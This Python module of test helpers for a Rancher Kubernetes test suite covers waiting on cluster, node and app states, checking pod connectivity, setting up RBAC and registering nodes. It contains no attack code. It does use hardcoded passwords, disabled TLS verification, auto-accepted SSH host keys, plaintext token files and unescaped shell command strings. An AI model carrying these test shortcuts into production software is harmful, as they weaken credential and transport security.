dig_validation_pass = True
for expected_value in expected:
if expected_value not in str(dig_output):
dig_validation_pass = False
break
return dig_validation_pass
wait_for(callback=dig_check,
timeout_message="Failed to resolve {0}".format(host))
def validate_dns_record_deleted(client, dns_record, timeout=DEFAULT_TIMEOUT):
"""
Checks whether dns_record got deleted successfully.
    Validates that the dns_record is no longer returned by the given client.
@param client: Object client use to create dns_record
@param dns_record: record object subjected to be deleted
@param timeout: Max time to keep checking whether record is deleted or not
"""
time.sleep(2)
start = time.time()
records = client.list_dns_record(name=dns_record.name, ).data
while len(records) != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for record {} to be deleted"
"".format(dns_record.name))
time.sleep(.5)
records = client.list_dns_record(name=dns_record.name, ).data
def wait_for_nodes_to_become_active(client, cluster, exception_list=[],
retry_count=0):
nodes = client.list_node(clusterId=cluster.id).data
node_auto_deleted = False
for node in nodes:
if node.requestedHostname not in exception_list:
node = wait_for_node_status(client, node, "active")
if node is None:
print("Need to re-evalauate new node list")
node_auto_deleted = True
retry_count += 1
print("Retry Count:" + str(retry_count))
if node_auto_deleted and retry_count < 5:
wait_for_nodes_to_become_active(client, cluster, exception_list,
retry_count)
def wait_for_node_status(client, node, state):
uuid = node.uuid
start = time.time()
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
# Handle the case of nodes getting auto deleted when they are part of
# nodepools
if node_count == 1:
node_status = nodes[0].state
else:
print("Node does not exist anymore -" + uuid)
return None
while node_status != state:
if time.time() - start > MACHINE_TIMEOUT:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(5)
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
if node_count == 1:
node_status = nodes[0].state
else:
print("Node does not exist anymore -" + uuid)
return None
return node
def wait_for_node_to_be_deleted(client, node, timeout=300):
uuid = node.uuid
start = time.time()
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
while node_count != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for node delete")
time.sleep(.5)
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
def wait_for_cluster_node_count(client, cluster, expected_node_count,
timeout=300):
start = time.time()
nodes = client.list_node(clusterId=cluster.id).data
node_count = len(nodes)
while node_count != expected_node_count:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
nodes = client.list_node(clusterId=cluster.id).data
node_count = len(nodes)
def get_custom_host_registration_cmd(client, cluster, roles, node):
allowed_roles = ["etcd", "worker", "controlplane"]
cluster_tokens = client.list_cluster_registration_token(
clusterId=cluster.id).data
if len(cluster_tokens) > 0:
cluster_token = cluster_tokens[0]
else:
cluster_token = create_custom_host_registration_token(client, cluster)
additional_options = " --address " + node.public_ip_address + \
" --internal-address " + node.private_ip_address
if 'Administrator' == node.ssh_user:
cmd = cluster_token.windowsNodeCommand
cmd = cmd.replace('| iex', '--worker' + additional_options + ' | iex ')
else:
cmd = cluster_token.nodeCommand
for role in roles:
assert role in allowed_roles
cmd += " --" + role
cmd += additional_options
return cmd
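# Illustrative call -- 'node' is expected to expose public_ip_address, private_ip_address
# and ssh_user, as the AWS node objects used elsewhere in this file do:
#   cmd = get_custom_host_registration_cmd(client, cluster,
#                                          ["etcd", "controlplane", "worker"], node)
#   node.execute_command(cmd)   # run the returned registration command on the host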
def create_custom_host_registration_token(client, cluster):
    # Allow some time for the "cluster_owner" CRTB to take effect
time.sleep(5)
cluster_token = client.create_cluster_registration_token(
clusterId=cluster.id)
cluster_token = client.wait_success(cluster_token)
assert cluster_token.state == 'active'
return cluster_token
def get_cluster_by_name(client, name):
clusters = client.list_cluster(name=name).data
assert len(clusters) == 1, "Cluster " + name + " does not exist"
return clusters[0]
def get_cluster_type(client, cluster):
cluster_configs = [
"amazonElasticContainerServiceConfig",
"azureKubernetesServiceConfig",
"googleKubernetesEngineConfig",
"rancherKubernetesEngineConfig"
]
if "rancherKubernetesEngineConfig" in cluster:
nodes = client.list_node(clusterId=cluster.id).data
if len(nodes) > 0:
if nodes[0].nodeTemplateId is None:
return "Custom"
for cluster_config in cluster_configs:
if cluster_config in cluster:
return cluster_config
return "Imported"
def delete_cluster(client, cluster):
nodes = client.list_node(clusterId=cluster.id).data
# Delete nodes(in cluster) from AWS for Imported and Custom Cluster
if len(nodes) > 0:
cluster_type = get_cluster_type(client, cluster)
print(cluster_type)
if get_cluster_type(client, cluster) in ["Imported", "Custom"]:
filters = [
{'Name': 'tag:Name',
'Values': ['testcustom*', 'teststress*', 'testsa*']}]
ip_filter = {}
ip_list = []
ip_filter['Name'] = \
'network-interface.addresses.association.public-ip'
ip_filter['Values'] = ip_list
filters.append(ip_filter)
for node in nodes:
host_ip = resolve_node_ip(node)
ip_list.append(host_ip)
assert len(ip_filter) > 0
print(ip_filter)
aws_nodes = AmazonWebServices().get_nodes(filters)
if aws_nodes is None:
# search instances by IPs in case names do not follow patterns
aws_nodes = AmazonWebServices().get_nodes(filters=[ip_filter])
if aws_nodes is None:
print("no instance is found in AWS")
else:
for node in aws_nodes:
print(node.public_ip_address)
AmazonWebServices().delete_nodes(aws_nodes)
# Delete Cluster
client.delete(cluster)
def check_connectivity_between_workloads(p_client1, workload1, p_client2,
workload2, allow_connectivity=True):
wl1_pods = p_client1.list_pod(workloadId=workload1.id).data
wl2_pods = p_client2.list_pod(workloadId=workload2.id).data
for pod in wl1_pods:
for o_pod in wl2_pods:
check_connectivity_between_pods(pod, o_pod, allow_connectivity)
def check_connectivity_between_workload_pods(p_client, workload):
pods = p_client.list_pod(workloadId=workload.id).data
for pod in pods:
for o_pod in pods:
check_connectivity_between_pods(pod, o_pod)
def check_connectivity_between_pods(pod1, pod2, allow_connectivity=True):
pod_ip = pod2.status.podIp
if is_windows():
cmd = 'ping -w 1 -n 1 {0}'.format(pod_ip)
elif HARDENED_CLUSTER:
cmd = 'curl -I {}:{}'.format(pod_ip, TEST_IMAGE_PORT)
else:
cmd = "ping -c 1 -W 1 " + pod_ip
response = kubectl_pod_exec(pod1, cmd)
if not HARDENED_CLUSTER:
assert pod_ip in str(response)
if allow_connectivity:
if is_windows():
assert " (0% loss)" in str(response)
elif HARDENED_CLUSTER:
assert " 200 OK" in str(response)
else:
assert " 0% packet loss" in str(response)
else:
if is_windows():
assert " (100% loss)" in str(response)
elif HARDENED_CLUSTER:
assert " 200 OK" not in str(response)
else:
assert " 100% packet loss" in str(response)
def kubectl_pod_exec(pod, cmd):
command = "exec " + pod.name + " -n " + pod.namespaceId + " -- " + cmd
return execute_kubectl_cmd(command, json_out=False, stderr=True)
def exec_shell_command(ip, port, cmd, password, user="root", sshKey=None):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if sshKey:
ssh.connect(ip, username=user, key_filename=sshKey, port=port)
else:
ssh.connect(ip, username=user, password=password, port=port)
stdin, stdout, stderr = ssh.exec_command(cmd)
response = stdout.readlines()
return response
def wait_for_ns_to_become_active(client, ns, timeout=DEFAULT_TIMEOUT):
start = time.time()
time.sleep(10)
nss = client.list_namespace(uuid=ns.uuid).data
assert len(nss) == 1
ns = nss[0]
while ns.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
nss = client.list_namespace(uuid=ns.uuid).data
assert len(nss) == 1
ns = nss[0]
return ns
def wait_for_pod_images(p_client, workload, ns_name, expectedimage, numofpods,
timeout=DEFAULT_TIMEOUT):
start = time.time()
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
for x in range(0, numofpods - 1):
pod = pods["items"][x]
podimage = pod["spec"]["containers"][0]["image"]
while podimage != expectedimage:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for correct pod images")
time.sleep(.5)
pods = execute_kubectl_cmd(get_pods)
pod = pods["items"][x]
podimage = pod["spec"]["containers"][0]["image"]
def wait_for_pods_in_workload(p_client, workload, pod_count,
timeout=DEFAULT_TIMEOUT):
start = time.time()
pods = p_client.list_pod(workloadId=workload.id).data
while len(pods) != pod_count:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for pods in workload {}. Expected {}. "
"Got {}".format(workload.name, pod_count, len(pods)))
time.sleep(.5)
pods = p_client.list_pod(workloadId=workload.id).data
return pods
def get_user_client_and_cluster(client=None):
if not client:
client = get_user_client()
if CLUSTER_NAME == "":
clusters = client.list_cluster().data
else:
clusters = client.list_cluster(name=CLUSTER_NAME).data
assert len(clusters) > 0
cluster = clusters[0]
return client, cluster
def get_global_admin_client_and_cluster():
client = get_admin_client()
if CLUSTER_NAME == "":
clusters = client.list_cluster().data
else:
clusters = client.list_cluster(name=CLUSTER_NAME).data
assert len(clusters) > 0
cluster = clusters[0]
return client, cluster
def validate_cluster_state(client, cluster,
check_intermediate_state=True,
intermediate_state="provisioning",
nodes_not_in_active_state=[],
timeout=MACHINE_TIMEOUT):
start_time = time.time()
if check_intermediate_state:
cluster = wait_for_condition(
client, cluster,
lambda x: x.state == intermediate_state,
lambda x: 'State is: ' + x.state,
timeout=timeout)
assert cluster.state == intermediate_state
cluster = wait_for_condition(
client, cluster,
lambda x: x.state == "active",
lambda x: 'State is: ' + x.state,
timeout=timeout)
assert cluster.state == "active"
wait_for_nodes_to_become_active(client, cluster,
exception_list=nodes_not_in_active_state)
timeout = 60
start = time.time()
while "version" not in cluster.keys():
time.sleep(1)
cluster = client.reload(cluster)
delta = time.time() - start
if delta > timeout:
msg = "Timeout waiting for K8s version to be synced"
raise Exception(msg)
end_time = time.time()
diff = time.strftime("%H:%M:%S", time.gmtime(end_time - start_time))
print("The total time for provisioning/updating the cluster {} : {}".
format(cluster.name, diff))
return cluster
def wait_until_available(client, obj, timeout=DEFAULT_TIMEOUT):
start = time.time()
sleep = 0.01
while True:
time.sleep(sleep)
sleep *= 2
if sleep > 2:
sleep = 2
try:
obj = client.reload(obj)
except ApiError as e:
if e.error.status != 403:
raise e
else:
return obj
delta = time.time() - start
if delta > timeout:
msg = 'Timeout waiting for [{}:{}] for condition after {}' \
' seconds'.format(obj.type, obj.id, delta)
raise Exception(msg)
def delete_node(aws_nodes):
for node in aws_nodes:
AmazonWebServices().delete_node(node)
def cluster_cleanup(client, cluster, aws_nodes=None):
if RANCHER_CLEANUP_CLUSTER:
client.delete(cluster)
if aws_nodes is not None:
delete_node(aws_nodes)
else:
env_details = "env.CATTLE_TEST_URL='" + CATTLE_TEST_URL + "'\n"
env_details += "env.ADMIN_TOKEN='" + ADMIN_TOKEN + "'\n"
env_details += "env.USER_TOKEN='" + USER_TOKEN + "'\n"
env_details += "env.CLUSTER_NAME='" + cluster.name + "'\n"
create_config_file(env_details)
def create_config_file(env_details):
file = open(env_file, "w")
file.write(env_details)
file.close()
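# When RANCHER_CLEANUP_CLUSTER is False, cluster_cleanup() writes rancher_env.config with
# lines of the form below so a later run can reuse the cluster (values are placeholders):
#   env.CATTLE_TEST_URL='https://<rancher-server>'
#   env.ADMIN_TOKEN='<admin token>'
#   env.USER_TOKEN='<user token>'
#   env.CLUSTER_NAME='<cluster name>'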
def validate_hostPort(p_client, workload, source_port, cluster):
get_endpoint_url_for_workload(p_client, workload)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
pods = p_client.list_pod(workloadId=workload.id).data
nodes = get_schedulable_nodes(cluster)
for node in nodes:
target_name_list = []
for pod in pods:
print(pod.nodeId + " check " + node.id)
if pod.nodeId == node.id:
target_name_list.append(pod.name)
break
if len(target_name_list) > 0:
host_ip = resolve_node_ip(node)
curl_cmd = " http://" + host_ip + ":" + \
str(source_port) + "/name.html"
validate_http_response(curl_cmd, target_name_list)
def validate_lb(p_client, workload, source_port):
url = get_endpoint_url_for_workload(p_client, workload)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
target_name_list = get_target_names(p_client, [workload])
wait_until_lb_is_active(url)
validate_http_response(url + "/name.html", target_name_list)
def validate_nodePort(p_client, workload, cluster, source_port):
get_endpoint_url_for_workload(p_client, workload, 600)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
nodes = get_schedulable_nodes(cluster)
pods = p_client.list_pod(workloadId=wl.id).data
target_name_list = []
for pod in pods:
target_name_list.append(pod.name)
print("target name list:" + str(target_name_list))
for node in nodes:
host_ip = resolve_node_ip(node)
curl_cmd = " http://" + host_ip + ":" + \
str(source_port_wk) + "/name.html"
validate_http_response(curl_cmd, target_name_list)
def validate_clusterIp(p_client, workload, cluster_ip, test_pods, source_port):
pods = p_client.list_pod(workloadId=workload.id).data
target_name_list = []
for pod in pods:
target_name_list.append(pod["name"])
curl_cmd = "http://" + cluster_ip + ":" + \
str(source_port) + "/name.html"
for pod in test_pods:
validate_http_response(curl_cmd, target_name_list, pod)
def wait_for_pv_to_be_available(c_client, pv_object, timeout=DEFAULT_TIMEOUT):
start = time.time()
time.sleep(2)
list = c_client.list_persistent_volume(uuid=pv_object.uuid).data
assert len(list) == 1
pv = list[0]
while pv.state != "available":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to available")
time.sleep(.5)
list = c_client.list_persistent_volume(uuid=pv_object.uuid).data
assert len(list) == 1
pv = list[0]
return pv
def wait_for_pvc_to_be_bound(p_client, pvc_object, timeout=DEFAULT_TIMEOUT):
start = time.time()
time.sleep(2)
list = p_client.list_persistent_volume_claim(uuid=pvc_object.uuid).data
assert len(list) == 1
pvc = list[0]
while pvc.state != "bound":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to bound")
time.sleep(.5)
list = p_client.list_persistent_volume_claim(uuid=pvc_object.uuid).data
assert len(list) == 1
pvc = list[0]
return pvc
def create_wl_with_nfs(p_client, ns_id, pvc_name, wl_name,
mount_path, sub_path, is_daemonSet=False):
volumes = [{"type": "volume",
"name": "vol1",
"persistentVolumeClaim": {
"readOnly": "false",
"type": "persistentVolumeClaimVolumeSource",
"persistentVolumeClaimId": pvc_name
}}]
volumeMounts = [{"readOnly": "False",
"type": "volumeMount",
"mountPath": mount_path,
"subPath": sub_path,
"name": "vol1"
}]
con = [{"name": "test1",
"image": TEST_IMAGE,
"volumeMounts": volumeMounts
}]
if is_daemonSet:
workload = p_client.create_workload(name=wl_name,
containers=con,
namespaceId=ns_id,
volumes=volumes,
daemonSetConfig={})
else:
workload = p_client.create_workload(name=wl_name,
containers=con,
namespaceId=ns_id,
volumes=volumes)
return workload
def write_content_to_file(pod, content, filename):
cmd_write = "/bin/bash -c 'echo {1} > {0}'".format(filename, content)
if is_windows():
        cmd_write = \
            'powershell -NoLogo -NonInteractive -Command ' \
            '"& {{ echo {1} > {0} }}"'.format(filename, content)
output = kubectl_pod_exec(pod, cmd_write)
assert output.strip().decode('utf-8') == ""
def validate_file_content(pod, content, filename):
cmd_get_content = "/bin/bash -c 'cat {0}' ".format(filename)
if is_windows():
        cmd_get_content = 'powershell -NoLogo -NonInteractive -Command ' \
                          '"& {{ cat {0} }}"'.format(filename)
output = kubectl_pod_exec(pod, cmd_get_content)
assert output.strip().decode('utf-8') == content
def wait_for_mcapp_to_active(client, multiClusterApp,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
time.sleep(5)
# When the app is deployed it goes into Active state for a short
# period of time and then into installing/deploying.
mcapps = client.list_multiClusterApp(uuid=multiClusterApp.uuid,
name=multiClusterApp.name).data
start = time.time()
assert len(mcapps) == 1, "Cannot find multi cluster app"
mapp = mcapps[0]
while mapp.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
multiclusterapps = client.list_multiClusterApp(
uuid=multiClusterApp.uuid, name=multiClusterApp.name).data
assert len(multiclusterapps) == 1
mapp = multiclusterapps[0]
return mapp
def wait_for_app_to_active(client, app_id,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
"""
    First wait for the app to reach the deploying state, then wait for it to
    get to the active state. This is to avoid wrongly concluding that the app
    is active, as the app transitions installing > active > deploying > active.
@param client: Project client
@param app_id: App id of deployed app.
@param timeout: Max time allowed to wait for app to become active.
@return: app object
"""
start = time.time()
app_data = client.list_app(id=app_id).data
while len(app_data) == 0:
if time.time() - start > timeout / 10:
raise AssertionError(
"Timed out waiting for listing the app from API")
time.sleep(.2)
app_data = client.list_app(id=app_id).data
application = app_data[0]
while application.state != "deploying":
if time.time() - start > timeout / 3:
break
time.sleep(.2)
app_data = client.list_app(id=app_id).data
application = app_data[0]
while application.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for {0} to get to active,"
" the actual state: {1}".format(application.name,
application.state))
time.sleep(.5)
app = client.list_app(id=app_id).data
assert len(app) >= 1
application = app[0]
return application
def wait_for_app_to_remove(client, app_id,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
start = time.time()
app_data = client.list_app(id=app_id).data
if len(app_data) == 0:
return
application = app_data[0]
while application.state == "removing" or application.state == "active":
if time.time() - start > timeout / 10:
raise AssertionError(
"Timed out waiting for app to not be installed")
time.sleep(.2)
app_data = client.list_app(id=app_id).data
if len(app_data) == 0:
break
application = app_data[0]
def validate_response_app_endpoint(p_client, appId,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
ingress_list = p_client.list_ingress(namespaceId=appId).data
assert len(ingress_list) == 1
ingress = ingress_list[0]
if hasattr(ingress, 'publicEndpoints'):
for public_endpoint in ingress.publicEndpoints:
url = \
public_endpoint["protocol"].lower() + "://" + \
public_endpoint["hostname"]
print(url)
start = time.time()
try:
while True:
r = requests.head(url)
print(r.status_code)
if r.status_code == 200:
return
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting response to be 200.")
time.sleep(.5)
except requests.ConnectionError:
print("failed to connect")
assert False, "failed to connect to the app"
def resolve_node_ip(node):
if hasattr(node, 'externalIpAddress'):
node_ip = node.externalIpAddress
else:
node_ip = node.ipAddress
return node_ip
def provision_nfs_server():
node = AmazonWebServices().create_node(random_test_name("nfs-server"))
node.wait_for_ssh_ready()
c_path = os.getcwd()
cmd_path = c_path + "/tests/v3_api/scripts/nfs-setup.sh"
command = open(cmd_path, 'r').read()
node.execute_command(command)
return node
def get_defaut_question_answers(client, externalId):
def get_answer(quest):
if "default" in quest.keys():
answer = quest["default"]
else:
answer = ""
            # If the question is required and has no default, synthesize a
            # value for enum/password/string types; error out for other types.
if "required" in quest.keys():
if quest["required"]:
if quest["type"] == "enum" and "options" in quest.keys():
answer = quest["options"][0]
elif quest["type"] == "password":
answer = "R@ncher135"
elif quest["type"] == "string":
answer = "fake"
else:
assert False, \
"Cannot set default for types {}" \
"".format(quest["type"])
return answer
def check_if_question_needed(questions_and_answers, ques):
add_question = False
match_string = ques["showIf"]
match_q_as = match_string.split("&&")
for q_a in match_q_as:
items = q_a.split("=")
if len(items) == 1:
items.append("")
if items[0] in questions_and_answers.keys():
if questions_and_answers[items[0]] == items[1]:
add_question = True
else:
add_question = False
break
return add_question
questions_and_answers = {}
print("external id = {}".format(externalId))
template_revs = client.list_template_version(externalId=externalId).data
assert len(template_revs) == 1
template_rev = template_revs[0]
questions = template_rev.questions
for ques in questions:
add_question = True
if "showIf" in ques.keys():
add_question = \
check_if_question_needed(questions_and_answers, ques)
if add_question:
question = ques["variable"]
answer = get_answer(ques)
            questions_and_answers[question] = answer
if "showSubquestionIf" in ques.keys():
if ques["showSubquestionIf"] == answer:
sub_questions = ques["subquestions"]
for sub_question in sub_questions:
question = sub_question["variable"]
questions_and_answers[question] = \
get_answer(sub_question)
print("questions_and_answers = {}".format(questions_and_answers))
return questions_and_answers
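# Illustrative sketch (hypothetical question payload, not from a real chart):
# shows how get_defaut_question_answers() resolves a single question. A
# required question without a default gets a type-dependent fake value:
# options[0] for enum, "R@ncher135" for password, "fake" for string.
_EXAMPLE_CATALOG_QUESTION = {
    "variable": "mysqlUser",
    "type": "string",
    "required": True,
}
# For the payload above the computed answer is "fake", stored as
# {"mysqlUser": "fake"} in the returned questions_and_answers dict.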
def validate_app_deletion(client, app_id,
timeout=DEFAULT_APP_DELETION_TIMEOUT):
app_data = client.list_app(id=app_id).data
start = time.time()
if len(app_data) == 0:
return
application = app_data[0]
while application.state == "removing":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for app to delete")
time.sleep(.5)
app_data = client.list_app(id=app_id).data
if len(app_data) == 0:
break
application = app_data[0]
def validate_catalog_app(proj_client, app, external_id, answer=None):
"""
    This method validates that all deployed workloads are in the active state
    and run the correct chart version, and that the answers match.
    @param proj_client: Project client object of an existing project.
    @param app: Deployed app object.
    @param external_id: URL of the app in the catalog API.
    @param answer: answers the app asks for while deploying (body of the POST call).
    @return: Deployed app object.
"""
if answer is None:
answers = get_defaut_question_answers(get_user_client(), external_id)
else:
answers = answer
# validate app is active
app = wait_for_app_to_active(proj_client, app.id)
assert app.externalId == external_id, \
"the version of the app is not correct"
# check if associated workloads are active
ns = app.targetNamespace
parameters = external_id.split('&')
assert len(parameters) > 1, \
"Incorrect list of parameters from catalog external ID"
chart_prefix = parameters[len(parameters) - 2].split("=")[1]
chart_suffix = parameters[len(parameters) - 1].split("=")[1]
chart = chart_prefix + "-" + chart_suffix
app_name = parameters[len(parameters) - 2].split("=")[1]
workloads = proj_client.list_workload(namespaceId=ns).data
    # For the Longhorn app, only the active state of workloads is verified,
    # as Longhorn workloads do not have the workloadLabels field.
    # For all other apps both the active state and the chart version are verified.
if "longhorn" in app.externalId:
print("validating the Longhorn app, it may take longer than others")
for wl in workloads:
wait_for_wl_to_active(proj_client, wl)
else:
for wl in workloads:
print("Workload {} , state - {}".format(wl.id, wl.state))
assert wl.state == "active"
chart_deployed = get_chart_info(wl.workloadLabels)
print("Chart detail of app - {}".format(chart_deployed))
# '-' check is to make sure chart has both app name and version.
if app_name in chart_deployed and '-' in chart_deployed:
assert chart_deployed == chart, "the chart version is wrong"
# Validate_app_answers
assert len(answers.items() - app["answers"].items()) == 0, \
"Answers are not same as the original catalog answers"
return app
def get_chart_info(workloadlabels):
"""
This method finds either 'chart' tag or
'helm.sh/chart' tag from workload API
    @param workloadlabels: workloadLabels object from the workload API
@return: chart value of workload e.g. 'app_name-version'
"""
if "chart" in workloadlabels.keys():
return workloadlabels.chart
elif "helm.sh/chart" in workloadlabels.keys():
return workloadlabels["helm.sh/chart"]
else:
return ''
def create_user(client, cattle_auth_url=CATTLE_AUTH_URL):
user_name = random_name()
user = client.create_user(username=user_name,
password=USER_PASSWORD)
client.create_global_role_binding(globalRoleId="user",
subjectKind="User",
userId=user.id)
user_token = get_user_token(user.username, USER_PASSWORD, cattle_auth_url)
return user, user_token
def get_user_token(username, password, cattle_auth_url=CATTLE_AUTH_URL):
r = requests.post(cattle_auth_url, json={
'username': username,
'password': password,
'responseType': 'json',
}, verify=False)
print(r.json())
return r.json()["token"]
def rbac_get_user_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["user"]
return None
def rbac_get_user_token_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["token"]
return None
def rbac_get_kubeconfig_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["kubeconfig"]
return None
def rbac_get_project():
return rbac_data["project"]
def rbac_get_namespace():
return rbac_data["namespace"]
def rbac_get_workload():
return rbac_data["workload"]
def rbac_get_unshared_project():
return rbac_data["p_unshared"]
def rbac_get_unshared_ns():
return rbac_data["ns_unshared"]
def rbac_get_unshared_workload():
return rbac_data["wl_unshared"]
def rbac_prepare():
"""this function creates one project, one namespace,
and four users with different roles"""
admin_client, cluster = get_global_admin_client_and_cluster()
create_kubeconfig(cluster)
# create a new project in the cluster
project, ns = create_project_and_ns(ADMIN_TOKEN,
cluster,
random_test_name("p-test-rbac"))
con = [{"name": "test1",
"image": TEST_IMAGE}]
name = random_test_name("default")
p_client = get_project_client_for_token(project, ADMIN_TOKEN)
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id)
validate_workload(p_client, workload, "deployment", ns.name)
rbac_data["workload"] = workload
rbac_data["project"] = project
rbac_data["namespace"] = ns
# create new users
for key in rbac_data["users"]:
user1, token1 = create_user(admin_client)
rbac_data["users"][key]["user"] = user1
rbac_data["users"][key]["token"] = token1
# assign different role to each user
assign_members_to_cluster(admin_client,
rbac_data["users"][CLUSTER_OWNER]["user"],
cluster,
CLUSTER_OWNER)
assign_members_to_cluster(admin_client,
rbac_data["users"][CLUSTER_MEMBER]["user"],
cluster,
CLUSTER_MEMBER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_MEMBER]["user"],
project,
PROJECT_MEMBER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_OWNER]["user"],
project,
PROJECT_OWNER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_READ_ONLY]["user"],
project,
PROJECT_READ_ONLY)
# create kubeconfig files for each user
for key in rbac_data["users"]:
user_client = get_client_for_token(rbac_data["users"][key]["token"])
_, user_cluster = get_user_client_and_cluster(user_client)
rbac_data["users"][key]["kubeconfig"] = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
key + "_kubeconfig")
create_kubeconfig(user_cluster, rbac_data["users"][key]["kubeconfig"])
# create another project that none of the above users are assigned to
p2, ns2 = create_project_and_ns(ADMIN_TOKEN,
cluster,
random_test_name("p-unshared"))
name = random_test_name("default")
p_client = get_project_client_for_token(p2, ADMIN_TOKEN)
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns2.id)
validate_workload(p_client, workload, "deployment", ns2.name)
rbac_data["p_unshared"] = p2
rbac_data["ns_unshared"] = ns2
rbac_data["wl_unshared"] = workload
def rbac_cleanup():
""" remove the project, namespace and users created for the RBAC tests"""
try:
client = get_admin_client()
except Exception:
print("Not able to get admin client. Not performing RBAC cleanup")
return
for _, value in rbac_data["users"].items():
try:
client.delete(value["user"])
except Exception:
pass
client.delete(rbac_data["project"])
client.delete(rbac_data["wl_unshared"])
client.delete(rbac_data["p_unshared"])
def check_condition(condition_type, status):
def _find_condition(resource):
if not hasattr(resource, "conditions"):
return False
if resource.conditions is None:
return False
for condition in resource.conditions:
if condition.type == condition_type and condition.status == status:
return True
return False
return _find_condition
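# Illustrative sketch (hypothetical resource object): check_condition()
# builds a predicate suitable for a wait/poll loop; it matches resources
# whose conditions list contains the given type/status pair.
def _example_check_condition():
    from types import SimpleNamespace
    ready = check_condition("Ready", "True")
    resource = SimpleNamespace(
        conditions=[SimpleNamespace(type="Ready", status="True")])
    return ready(resource)  # True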
def create_catalog_external_id(catalog_name, template, version,
project_cluster_id=None, catalog_type=None):
if catalog_type is None:
return "catalog://?catalog=" + catalog_name + \
"&template=" + template + "&version=" + version
elif catalog_type == "project" or catalog_type == "cluster":
return "catalog://?catalog=" + project_cluster_id + "/" \
+ catalog_name + "&type=" + catalog_type \
+ "Catalog&template=" + template + "&version=" + version
def wait_for_catalog_active(client, catalog, timeout=DEFAULT_CATALOG_TIMEOUT):
time.sleep(2)
catalog_data = client.list_catalog(name=catalog.name)
print(catalog_data)
start = time.time()
assert len(catalog_data["data"]) >= 1, "Cannot find catalog"
catalog = catalog_data["data"][0]
while catalog.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
catalog_data = client.list_catalog(name=catalog.name)
assert len(catalog_data["data"]) >= 1
catalog = catalog_data["data"][0]
return catalog
def readDataFile(data_dir, name):
fname = os.path.join(data_dir, name)
print("File: " + fname)
is_file = os.path.isfile(fname)
assert is_file
with open(fname) as f:
return f.read()
def set_url_password_token(rancher_url, server_url=None):
"""Returns a ManagementContext for the default global admin user."""
auth_url = \
rancher_url + "/v3-public/localproviders/local?action=login"
r = requests.post(auth_url, json={
'username': 'admin',
'password': 'admin',
'responseType': 'json',
}, verify=False)
print(r.json())
token = r.json()['token']
print(token)
# Change admin password
client = rancher.Client(url=rancher_url + "/v3",
token=token, verify=False)
admin_user = client.list_user(username="admin").data
admin_user[0].setpassword(newPassword=ADMIN_PASSWORD)
# Set server-url settings
serverurl = client.list_setting(name="server-url").data
if server_url:
client.update(serverurl[0], value=server_url)
else:
client.update(serverurl[0], value=rancher_url)
return token
def validate_create_catalog(token, catalog_name, branch, url, permission=True):
"""
This function validates if the user has the permission to create a
global catalog.
:param token: user's token
:param catalog_name: the name of the catalog
:param branch: the branch of the git repo
:param url: the url of the git repo
:param permission: boolean value, True if the user can create catalog
:return: the catalog object or None
"""
client = get_client_for_token(token)
if not permission:
with pytest.raises(ApiError) as e:
client.create_catalog(name=catalog_name,
branch=branch,
url=url)
error_msg = "user with no permission should receive 403: Forbidden"
error_code = e.value.error.code
error_status = e.value.error.status
assert error_status == 403 and error_code == 'Forbidden', error_msg
return None
else:
try:
client.create_catalog(name=catalog_name,
branch=branch,
url=url)
except ApiError as e:
assert False, "user with permission should receive no exception:" \
+ str(e.error.status) + " " + e.error.code
catalog_list = client.list_catalog(name=catalog_name).data
assert len(catalog_list) == 1
return catalog_list[0]
def generate_template_global_role(name, new_user_default=False, template=None):
""" generate a template that is used for creating a global role"""
if template is None:
template = TEMPLATE_MANAGE_CATALOG
template = deepcopy(template)
if new_user_default:
template["newUserDefault"] = "true"
else:
template["newUserDefault"] = "false"
if name is None:
name = random_name()
template["name"] = name
return template
def wait_for_backup_to_active(cluster, backupname,
timeout=DEFAULT_TIMEOUT):
start = time.time()
etcdbackups = cluster.etcdBackups(name=backupname)
assert len(etcdbackups) == 1
